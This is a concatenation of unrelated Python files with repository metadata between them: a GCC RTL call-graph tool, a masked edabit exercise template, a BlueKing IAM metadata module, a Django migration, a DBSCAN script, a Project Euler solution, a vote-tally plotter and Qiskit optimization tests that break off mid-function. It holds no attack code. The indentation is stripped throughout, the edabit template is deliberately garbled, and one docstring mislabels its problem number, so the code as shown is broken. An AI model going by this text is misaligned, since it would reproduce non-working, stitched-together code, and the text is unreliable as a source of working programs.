def unit_test_check_error(test, ref, results):
if len(results) == len(ref):
for i in range(0, len(results)):
if results[i] != ref[i]:
print_err("[FAIL] \"{}\" @line {}, \"{}\" vs \"{}\"".
format(test, i, results[i], ref[i]))
return 1
else:
print_err("[FAIL] {}".format(test))
return 1
return 0
#
# unit_test_add_call
#
def unit_test_add_call(functions, function_name, calls):
if function_name in functions:
print("ERROR: Function already defined!!")
functions[function_name] = dict()
functions[function_name]["files"] = ["unit_test.c"]
functions[function_name]["calls"] = dict()
for call in calls:
functions[function_name]["calls"][call] = True
functions[function_name]["refs"] = dict()
functions[function_name]["callee_calls"] = dict()
functions[function_name]["callee_refs"] = dict()
#
# Add callee to database
#
def build_callee_info(function_db):
for call, value in function_db.items():
for callee in value["calls"]:
if callee in function_db and \
call not in function_db[callee]["callee_calls"]:
function_db[callee]["callee_calls"][call] = 1
for callee in value["refs"]:
if callee in function_db and \
call not in function_db[callee]["callee_refs"]:
function_db[callee]["callee_refs"][call] = 1
#
# dump_path_ascii()
#
def dump_path_ascii(path, reverse, **kwargs):
externs = kwargs.get("externs", False)
truncated = kwargs.get("truncated", False)
std_buf = kwargs.get("stdio_buffer", None)
if len(path) == 0:
return
ascii_path = ""
for function in reversed(path) if reverse else path:
if ascii_path != "":
ascii_path += " -> "
ascii_path += '"' + function + '"'
if truncated or externs:
ascii_path += ';\n"{}"{}{}'. \
format(function if not reverse else path[-1],
" [style=dashed]" if externs else "",
" [color=red]" if truncated else "")
print_buf(std_buf, ascii_path + ";")
#
# Dump path as ASCII to stdout
#
def dump_path(path, functions, function_name, **kwargs):
max_depth = kwargs.get("max_depth", 0)
reverse_path = kwargs.get("reverse_path", False)
exclude = kwargs.get("exclude", None)
call_index = kwargs.get("call_index", "calls")
no_externs = kwargs.get("no_externs", False)
std_buf = kwargs.get("stdio_buffer", None)
#
# Pass on __seen_in_path as a way to determine if a node in the graph
# was already processed
#
if "__seen_in_path" in kwargs:
seen_in_path = kwargs["__seen_in_path"]
else:
seen_in_path = dict()
kwargs["__seen_in_path"] = seen_in_path
#
# If reached the max depth or need to stop due to exclusion, recursion
# display the path up till the previous entry.
#
if (exclude is not None and re.match(exclude, function_name) is not None) \
or (max_depth > 0 and len(path) >= max_depth):
dump_path_ascii(path, reverse_path, stdio_buffer=std_buf,
truncated=True)
return
#
# If already seen, we need to terminate the path here...
#
if function_name in seen_in_path:
if (max_depth <= 0 or (len(path) + 1) <= max_depth):
dump_path_ascii(path + [function_name], reverse_path,
stdio_buffer=std_buf)
return
seen_in_path[function_name] = True
#
# Now walk the path for each child
#
children = 0
for caller in functions[function_name][call_index]:
#
# The child is a known function, handle this trough recursion
#
if caller in functions:
children += 1
if function_name != caller:
dump_path(path + [function_name],
functions, caller, **kwargs)
else:
#
# This is a recurrence for this function, add it once
#
dump_path_ascii(path + [function_name, caller], reverse_path,
stdio_buffer=std_buf)
#
# This is a external child, so we can not handle this recursive.
# However as there are no more children, we can handle it here
# (if it can be included).
#
elif (exclude is None or re.match(exclude, caller) is None) and \
(max_depth <= 0 or (len(path) + 2) <= max_depth) and \
not no_externs:
children += 1
dump_path_ascii(path + [function_name, caller], reverse_path,
externs=True, stdio_buffer=std_buf)
else:
print_buf(std_buf, '"{}" [color=red];'.
format(function_name))
#
# If there where no children, the path ends here, so dump it.
#
if children == 0:
dump_path_ascii(path + [function_name], reverse_path,
stdio_buffer=std_buf)
#
# print_err()
#
def print_err(text):
sys.stderr.write(text + "\n")
#
# print_dbg()
#
def print_dbg(text):
sys.stderr.write("DBG: " + text + "\n")
#
# print_buf()
#
def print_buf(buf, text):
if buf is not None:
buf.append(text)
print(text)
#
# Dump function details:
#
def dump_function_info(functions, function, details):
finfo = functions[function]
print(" {}() {}".format(function,
finfo["files"] if details else ""))
if details:
for caller in sorted(finfo["calls"].keys()):
print(" --> {}".format(caller))
if len(finfo["calls"]) > 0 and len(finfo["callee_calls"]) > 0:
print(" ===")
for caller in sorted(finfo["callee_calls"].keys()):
print(" <-- {}".format(caller))
print("\n")
#
# Build full call graph
#
def full_call_graph(functions, **kwargs):
exclude = kwargs.get("exclude", None)
no_externs = kwargs.get("no_externs", False)
std_buf = kwargs.get("stdio_buffer", None)
print_buf(std_buf, "strict digraph callgraph {")
#
# Simply walk all nodes and print the callers
#
for func in sorted(functions.keys()):
printed_functions = 0
if exclude is None or \
re.match(exclude, func) is None:
for caller in sorted(functions[func]["calls"].keys()):
if (not no_externs or caller in functions) and \
(exclude is None or
re.match(exclude, caller) is None):
print_buf(std_buf, '"{}" -> "{}";'.format(func, caller))
if caller not in functions:
print_buf(std_buf, '"{}" [style=dashed]'.
format(caller))
printed_functions += 1
if printed_functions == 0:
print_buf(std_buf, '"{}"'.format(func))
print_buf(std_buf, "}")
#
# Main()
#
def main():
#
# Data sets
#
functions = dict()
#
# Command line argument parsing
#
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug",
help="Enable debugging", action="store_true")
parser.add_argument("-f", "--functions", metavar="FUNCTION",
help="Dump functions name(s)",
type=str, default="&None", const="&all",
action='store', nargs='?')
parser.add_argument("--callee",
help="Callgraph for the function being called",
type=str, metavar="FUNCTION")
parser.add_argument("--caller",
help="Callgraph for functions being called by",
type=str, metavar="FUNCTION")
parser.add_argument("-e", "--exclude",
help="RegEx for functions to exclude",
type=str, metavar="REGEX")
parser.add_argument("--no-externs",
help="Do not show external functions",
action="store_true")
parser.add_argument("--no-warnings",
help="Do not show warnings on the console",
action="store_true")
parser.add_argument("--max-depth", metavar="DEPTH",
help="Maximum tree depth traversal, default no depth",
type=int, default=0)
parser.add_argument("--unit-test", help=argparse.SUPPRESS,
action="store_true")
parser.add_argument("RTLFILE", help="GCCs RTL .expand file", nargs="+")
parser.parse_args()
config = parser.parse_args()
#
# If the unit test option is specified jump straight into it...
#
if config.unit_test:
return unit_test()
#
# Additional option checks
#
if config.caller and config.callee:
print_err("ERROR: Either --caller or --callee option should be given, "
"not both!".format(config.callee))
return 1
if config.exclude is not None:
try:
exclude_regex = re.compile(config.exclude)
except Exception as e:
print_err("ERROR: Invalid --exclude regular expression, "
"\"{}\" -> \"{}\"!".
format(config.exclude, e))
return 1
else:
exclude_regex = None
if not config.caller and not config.callee and config.max_depth:
print_err("ERROR: The --max_depth option is only valid with "
"--caller or --callee!")
return 1
#
# Check if all files exist
#
for file in config.RTLFILE:
if not os.path.isfile(file) or not os.access(file, os.R_OK):
print_err("ERROR: Can't open rtl file, \"{}\"!".format(file))
return 1
#
# Regex to extract functions
#
function = re.compile(
"^;; Function (?P<mangle>.*)\s+\((?P<function>\S+)(,.*)?\).*$")
call = re.compile(
"^.*\(call.*\"(?P<target>.*)\".*$")
symbol_ref = re.compile("^.*\(symbol_ref.*\"(?P<target>.*)\".*$")
#
# Parse each line in each file given
#
function_name = ""
start_time = time.time()
for line in fileinput.input(config.RTLFILE):
#
# Find function entry point
#
match = re.match(function, line)
if match is not None:
function_name = match.group("function")
if function_name in functions:
if not config.no_warnings:
print_err("WARNING: Function {} defined in multiple"
"files \"{}\"!".
format(function_name,
', '.join(map(
str,
functions[function_name]["files"] +
[fileinput.filename()]))))
else:
functions[function_name] = dict()
functions[function_name]["files"] = list()
functions[function_name]["calls"] = dict()
functions[function_name]["refs"] = dict()
functions[function_name]["callee_calls"] = dict()
functions[function_name]["callee_refs"] = dict()
functions[function_name]["files"].append(fileinput.filename())
#
#
# Find direct function calls
else:
match = re.match(call, line)
if match is not None:
target = match.group("target")
if target not in functions[function_name]["calls"]:
functions[function_name]["calls"][target] = True
else:
match = re.match(symbol_ref, line)
if match is not None:
target = match.group("target")
if target not in functions[function_name]["refs"]:
functions[function_name]["refs"][target] = True
if config.debug:
print_dbg("[PERF] Processing {} RTL files took {:.9f} seconds".format(
len(config.RTLFILE), time.time() - start_time))
print_dbg("[PERF] Found {} functions".format(len(functions)))
#
# Build callee data
#
start_time = time.time()
build_callee_info(functions)
if config.debug:
print_dbg("[PERF] Building callee info took {:.9f} seconds".format(
time.time() - start_time))
#
# Dump functions if requested
#
if config.functions != "&None":
print("\nFunction dump")
print("-------------")
if config.functions == "&all":
for func in sorted(functions.keys()):
dump_function_info(functions, func, config.debug)
else:
if config.functions in functions:
dump_function_info(functions, config.functions, config.debug)
else:
print_err("ERROR: Can't find callee, \"{}\" in RTL data!".
format(config.callee))
return 1
return 0
start_time = time.time()
#
# Dump full call graph
#
if not config.caller and not config.callee:
full_call_graph(functions, exclude=config.exclude,
no_externs=config.no_externs)
#
# Build callgraph for callee function
#
if config.callee is not None:
if config.callee in functions:
print("strict digraph callgraph {")
print('"{}" [color=blue, style=filled];'.format(config.callee))
dump_path([], functions, config.callee,
max_depth=config.max_depth,
reverse_path=True,
exclude=exclude_regex,
call_index="callee_calls")
print("}")
else:
print_err("ERROR: Can't find callee, \"{}\" in RTL data!".
format(config.callee))
return 1
#
# Build callgraph for caller function
#
elif config.caller is not None:
if config.caller in functions:
print("strict digraph callgraph {")
print('"{}" [color=blue, style=filled];'.format(config.caller))
dump_path([], functions, config.caller,
max_depth=config.max_depth,
exclude=exclude_regex,
no_externs=config.no_externs)
print("}")
else:
print_err("ERROR: Can't find caller \"{}\" in RTL data!".
format(config.caller))
return 1
if config.debug:
print_dbg("[PERF] Generating .dot file took {:.9f} seconds".format(
time.time() - start_time))
return 0
#
# Start main() as default entry point...
#
if __name__ == '__main__':
exit(main())
|
[
"echaudro@redhat.com"
] |
echaudro@redhat.com
|
45620672ed607a3171dae6cf19a63dea278a32ce
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/edabit/_Edabit-Solutions-master/Odd Up, Even Down/solution.py
|
280dd4e50c5e27743667091935a4280519266904
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 149
|
py
|
___ transform(lst
output # list
___ i __ lst:
__ i % 2 __ 0:
?.a.. i-1)
____
?.a.. i+1)
r.. ?
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
96b72c3e8d75f73087aa5d785f9d688d43fba4a9
|
920b9cb23d3883dcc93b1682adfee83099fee826
|
/iam/meta.py
|
1c14641c524eaf4af143f55b16491ad41f993154
|
[
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] |
permissive
|
TencentBlueKing/bk-itsm
|
f817fb166248d3059857b57d03e8b5ec1b78ff5b
|
2d708bd0d869d391456e0fb8d644af3b9f031acf
|
refs/heads/master
| 2023-08-31T23:42:32.275836
| 2023-08-22T08:17:54
| 2023-08-22T08:17:54
| 391,839,825
| 100
| 86
|
MIT
| 2023-09-14T08:24:54
| 2021-08-02T06:35:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,689
|
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
_SYSTEM = "system"
_RESOURCES = "resources"
_ACTIONS = "actions"
__meta_info__ = {_SYSTEM: {}, _RESOURCES: {}, _ACTIONS: {}}
def setup_system(system_id, system_name):
__meta_info__[_SYSTEM].setdefault(system_id, {})["name"] = system_name
def get_system_name(system_id):
return __meta_info__[_SYSTEM].get(system_id, {}).get("name")
def setup_resource(system_id, resource_id, resource_name):
__meta_info__[_RESOURCES].setdefault(system_id, {}).setdefault(resource_id, {})["name"] = resource_name
def get_resource_name(system_id, resource_id):
return __meta_info__[_RESOURCES].get(system_id, {}).get(resource_id, {}).get("name")
def setup_action(system_id, action_id, action_name):
__meta_info__[_ACTIONS].setdefault(system_id, {}).setdefault(action_id, {})["name"] = action_name
def get_action_name(system_id, action_id):
return __meta_info__[_ACTIONS].get(system_id, {}).get(action_id, {}).get("name")
|
[
"1758504262@qq.com"
] |
1758504262@qq.com
|
230fd3f583cf4b11ae9b08638c18199189fa8127
|
e1e101c278d6bba461e3782325d834ca199d7ce4
|
/hosts/migrations/0004_auto_20201109_2011.py
|
2567de45c317ce450e1d24a08d75ba0e4d7723c4
|
[
"MIT"
] |
permissive
|
mateuslimax22/djangorest
|
6efeeff6a7282ca2d9ebda9c62eb3f165222d4ac
|
6d9a0cfa72c5e287218e53eaf708b7175bca475b
|
refs/heads/master
| 2023-01-11T01:08:02.234544
| 2020-11-10T23:24:15
| 2020-11-10T23:24:15
| 311,785,687
| 0
| 0
| null | 2020-11-10T23:24:17
| 2020-11-10T21:11:24
| null |
UTF-8
|
Python
| false
| false
| 508
|
py
|
# Generated by Django 3.1.3 on 2020-11-09 23:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('vulnerabilities', '0005_remove_vulnerability_affected_host'),
('hosts', '0003_host_host'),
]
operations = [
migrations.AlterField(
model_name='host',
name='host',
field=models.ManyToManyField(blank=True, related_name='book_list', to='vulnerabilities.Vulnerability'),
),
]
|
[
"mateuslimax8@gmail.com"
] |
mateuslimax8@gmail.com
|
b017ea97681e78e573ef2263673d410c3b1bbfb0
|
ed04425041ff7c18eb60d27dda5353ba3b65974b
|
/src/dbscan.py
|
e6518e7dd770950a047e138a2a618b82847123bb
|
[] |
no_license
|
alexmi256/colordiff
|
36e927b5acb72f61bc50a17cbfed4221e42c8e61
|
db91e0a10a0d8b1d1e3f734ca4c67635344f2b55
|
refs/heads/main
| 2023-03-15T09:32:23.209377
| 2021-03-08T02:19:47
| 2021-03-08T02:19:47
| 345,106,384
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 677
|
py
|
from sklearn.cluster import DBSCAN
from src.example import make_matrix, print_clusters
# Try out DBScan
colors, distance_matrix = make_matrix()
# Compute DBSCAN
# The results are pretty bad
db = DBSCAN(eps=17, metric="precomputed", min_samples=1).fit(distance_matrix)
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
n_noise_ = list(labels).count(-1)
print("Estimated number of clusters: %d" % n_clusters_)
print("Estimated number of noise points: %d" % n_noise_)
if -1 in labels:
print("There were no clusters found")
else:
print_clusters(colors, labels, distance_matrix)
|
[
"alexmi3.14@gmail.com"
] |
alexmi3.14@gmail.com
|
18ec3d099574b4d49f99ed32f6cf549f4d0278bb
|
a9efc041fa75d447b26f7a57fc8673f48360acec
|
/pe015.py
|
52a33de20c1caad00896b0cdd18f40ee58e87e57
|
[] |
no_license
|
stepheniota/euler
|
9b497073c49f764a4e1140ef18851f6a0bfafdb0
|
6f71440ebdc34b1e077c9cf145e456648a35f474
|
refs/heads/main
| 2023-08-27T01:15:56.915553
| 2021-11-14T10:54:51
| 2021-11-14T10:54:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
""" pe 15 - power digit sum
What is the sum of the digits of the number 2^{1000}?
"""
ans = sum(int(n) for n in str(2**1000))
print(ans)
|
[
"iota@usc.edu"
] |
iota@usc.edu
|
b9fabd9eff824bc52f679ea4a021f6c1c82aac47
|
21363a3e7ca2cd9be81730fdd52b2c7cc0b06d4b
|
/codebase/Analysis.py
|
e6231222c936e1a75148c926d230da74ab72a1f8
|
[] |
no_license
|
AkshatParmar/InfoAndNetw
|
1ed9c86c09977fae9af16a4e5035acbf9aa12224
|
52723355638abd76e0f1a1057dd0644f6668081f
|
refs/heads/main
| 2023-01-24T11:17:32.871990
| 2020-12-08T21:34:30
| 2020-12-08T21:34:30
| 314,391,766
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
from matplotlib import pyplot as plt
from server import vote_tally as vt
def plot():
presidents, senators = vt()
##Senators
plt.figure()
ax = plt.subplot()
s_keys= list(senators.keys())
s_votes = list(senators.values())
cmap = plt.cm.get_cmap('hsv', 10)
sen_n = len(s_keys)
for i in range(sen_n):
plt.bar(s_keys[i], s_votes[i], color=cmap(i), edgecolor='black')
ax.get_yaxis().set_ticks([])
ax.set_xticklabels(s_votes)
plt.title('Vote Tally')
ax.legend(labels=s_keys, title='Candidates')
plt.savefig('senators.png')
###Presidents
plt.figure()
ax = plt.subplot()
p_keys = list(presidents.keys())
p_votes = list(presidents.values())
cmap = plt.cm.get_cmap('hsv', 10)
sen_n = len(p_keys)
for i in range(sen_n):
plt.bar(p_keys[i], p_votes[i], color=cmap(i), edgecolor='black')
ax.get_yaxis().set_ticks([])
ax.set_xticklabels(p_votes)
plt.title('Vote Tally')
ax.legend(labels=p_keys, title = 'Candidates')
plt.savefig('presidents.png')
if __name__ == "__main__":
plot()
|
[
"ranisayed16@gmail.com"
] |
ranisayed16@gmail.com
|
7a410cee59ce745aece00045c89256e91bdcc0c3
|
e53220dfff20c05516aa3e1b605758aae5344136
|
/test/python/transpiler/test_optimize_1q_decomposition.py
|
86e9d379aaa1de75d7ddd0add9c944eb07377461
|
[
"Apache-2.0"
] |
permissive
|
Arihant-Joshi/qiskit-terra
|
67bf0a2f03f5abdb324bdedcfb710c65d772c0d9
|
3a402a3b4726e16c26f7235dc15bfb7e29617efe
|
refs/heads/main
| 2023-06-27T02:10:07.191096
| 2021-08-03T09:01:37
| 2021-08-03T09:01:37
| 363,187,722
| 0
| 0
|
Apache-2.0
| 2021-07-29T14:57:09
| 2021-04-30T15:46:41
|
Python
|
UTF-8
|
Python
| false
| false
| 18,598
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=no-member
"""Test the optimize-1q-gate pass"""
import unittest
import ddt
import numpy as np
from qiskit.circuit import QuantumRegister, QuantumCircuit, ClassicalRegister
from qiskit.circuit.library.standard_gates import UGate, SXGate, PhaseGate
from qiskit.circuit.library.standard_gates import U3Gate, U2Gate, U1Gate
from qiskit.circuit.random import random_circuit
from qiskit.transpiler import PassManager
from qiskit.transpiler.passes import Optimize1qGatesDecomposition
from qiskit.transpiler.passes import BasisTranslator
from qiskit.circuit.equivalence_library import SessionEquivalenceLibrary as sel
from qiskit.quantum_info import Operator
from qiskit.test import QiskitTestCase
from qiskit.circuit import Parameter
@ddt.ddt
class TestOptimize1qGatesDecomposition(QiskitTestCase):
"""Test for 1q gate optimizations."""
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
["r"],
)
def test_optimize_h_gates_pass_manager(self, basis):
"""Transpile: qr:--[H]-[H]-[H]--"""
qr = QuantumRegister(1, "qr")
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.h(qr[0])
expected = QuantumCircuit(qr)
expected.u(np.pi / 2, 0, np.pi, qr) # U2(0, pi)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertTrue(Operator(circuit).equiv(Operator(result)))
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
["r"],
)
def test_ignores_conditional_rotations(self, basis):
"""Conditional rotations should not be considered in the chain."""
qr = QuantumRegister(1, "qr")
cr = ClassicalRegister(2, "cr")
circuit = QuantumCircuit(qr, cr)
circuit.p(0.1, qr).c_if(cr, 1)
circuit.p(0.2, qr).c_if(cr, 3)
circuit.p(0.3, qr)
circuit.p(0.4, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertTrue(Operator(circuit).equiv(Operator(result)))
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
["r"],
)
def test_in_the_back(self, basis):
"""Optimizations can be in the back of the circuit.
See https://github.com/Qiskit/qiskit-terra/issues/2004.
qr0:--[U1]-[U1]-[H]--
"""
qr = QuantumRegister(1, "qr")
circuit = QuantumCircuit(qr)
circuit.p(0.3, qr)
circuit.p(0.4, qr)
circuit.h(qr)
expected = QuantumCircuit(qr)
expected.p(0.7, qr)
expected.h(qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertTrue(Operator(circuit).equiv(Operator(result)))
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["rz", "sx"],
["u1", "rx"],
["p", "sx"],
)
def test_single_parameterized_circuit(self, basis):
"""Parameters should be treated as opaque gates."""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
theta = Parameter("theta")
qc.p(0.3, qr)
qc.p(0.4, qr)
qc.p(theta, qr)
qc.p(0.1, qr)
qc.p(0.2, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
self.assertTrue(
Operator(qc.bind_parameters({theta: 3.14})).equiv(
Operator(result.bind_parameters({theta: 3.14}))
)
)
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
)
def test_parameterized_circuits(self, basis):
"""Parameters should be treated as opaque gates."""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
theta = Parameter("theta")
qc.p(0.3, qr)
qc.p(0.4, qr)
qc.p(theta, qr)
qc.p(0.1, qr)
qc.p(0.2, qr)
qc.p(theta, qr)
qc.p(0.3, qr)
qc.p(0.2, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
self.assertTrue(
Operator(qc.bind_parameters({theta: 3.14})).equiv(
Operator(result.bind_parameters({theta: 3.14}))
)
)
@ddt.data(
["cx", "u3"],
["cz", "u3"],
["cx", "u"],
["p", "sx", "u", "cx"],
["cz", "rx", "rz"],
["rxx", "rx", "ry"],
["iswap", "rx", "rz"],
["u1", "rx"],
["rz", "sx"],
["p", "sx"],
)
def test_parameterized_expressions_in_circuits(self, basis):
"""Expressions of Parameters should be treated as opaque gates."""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
theta = Parameter("theta")
phi = Parameter("phi")
sum_ = theta + phi
product_ = theta * phi
qc.p(0.3, qr)
qc.p(0.4, qr)
qc.p(theta, qr)
qc.p(phi, qr)
qc.p(sum_, qr)
qc.p(product_, qr)
qc.p(0.3, qr)
qc.p(0.2, qr)
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(qc)
self.assertTrue(
Operator(qc.bind_parameters({theta: 3.14, phi: 10})).equiv(
Operator(result.bind_parameters({theta: 3.14, phi: 10}))
)
)
def test_identity_xyx(self):
"""Test lone identity gates in rx ry basis are removed."""
circuit = QuantumCircuit(2)
circuit.rx(0, 1)
circuit.ry(0, 0)
basis = ["rxx", "rx", "ry"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_zxz(self):
"""Test lone identity gates in rx rz basis are removed."""
circuit = QuantumCircuit(2)
circuit.rx(0, 1)
circuit.rz(0, 0)
basis = ["cz", "rx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_psx(self):
"""Test lone identity gates in p sx basis are removed."""
circuit = QuantumCircuit(1)
circuit.p(0, 0)
basis = ["cx", "p", "sx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_u(self):
"""Test lone identity gates in u basis are removed."""
circuit = QuantumCircuit(1)
circuit.u(0, 0, 0, 0)
basis = ["cx", "u"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_u3(self):
"""Test lone identity gates in u3 basis are removed."""
circuit = QuantumCircuit(1)
circuit.append(U3Gate(0, 0, 0), [0])
basis = ["cx", "u3"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_r(self):
"""Test lone identity gates in r basis are removed."""
circuit = QuantumCircuit(1)
circuit.r(0, 0, 0)
basis = ["r"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_identity_u1x(self):
"""Test lone identity gates in u1 rx basis are removed."""
circuit = QuantumCircuit(2)
circuit.u1(0, 0)
circuit.rx(0, 1)
basis = ["cx", "u1", "rx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual([], result.data)
def test_overcomplete_basis(self):
"""Test optimization with an overcomplete basis."""
circuit = random_circuit(3, 3, seed=42)
basis = ["rz", "rxx", "rx", "ry", "p", "sx", "u", "cx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
basis_translated = passmanager.run(circuit)
passmanager = PassManager()
passmanager.append(Optimize1qGatesDecomposition(basis))
result_full = passmanager.run(basis_translated)
self.assertTrue(Operator(circuit).equiv(Operator(result_full)))
self.assertGreater(basis_translated.depth(), result_full.depth())
def test_euler_decomposition_worse(self):
"""Ensure we don't decompose to a deeper circuit."""
circuit = QuantumCircuit(1)
circuit.rx(-np.pi / 2, 0)
circuit.rz(-np.pi / 2, 0)
basis = ["rx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
# decomposition of circuit will result in 3 gates instead of 2
# assert optimization pass doesn't use it.
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_euler_decomposition_worse_2(self):
"""Ensure we don't decompose to a deeper circuit in an edge case."""
circuit = QuantumCircuit(1)
circuit.rz(0.13, 0)
circuit.ry(-0.14, 0)
basis = ["ry", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_euler_decomposition_zsx(self):
"""Ensure we don't decompose to a deeper circuit in the ZSX basis."""
circuit = QuantumCircuit(1)
circuit.rz(0.3, 0)
circuit.sx(0)
circuit.rz(0.2, 0)
circuit.sx(0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_euler_decomposition_zsx_2(self):
"""Ensure we don't decompose to a deeper circuit in the ZSX basis."""
circuit = QuantumCircuit(1)
circuit.sx(0)
circuit.rz(0.2, 0)
circuit.sx(0)
circuit.rz(0.3, 0)
basis = ["sx", "rz"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
self.assertEqual(circuit, result, f"Circuit:\n{circuit}\nResult:\n{result}")
def test_optimize_u_to_phase_gate(self):
"""U(0, 0, pi/4) -> p(pi/4). Basis [p, sx]."""
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.append(UGate(0, 0, np.pi / 4), [qr[0]])
expected = QuantumCircuit(qr)
expected.append(PhaseGate(np.pi / 4), [qr[0]])
basis = ["p", "sx"]
passmanager = PassManager()
passmanager.append(BasisTranslator(sel, basis))
passmanager.append(Optimize1qGatesDecomposition(basis))
result = passmanager.run(circuit)
msg = f"expected:\n{expected}\nresult:\n{result}"
self.assertEqual(expected, result, msg=msg)
def test_optimize_u_to_p_sx_p(self):
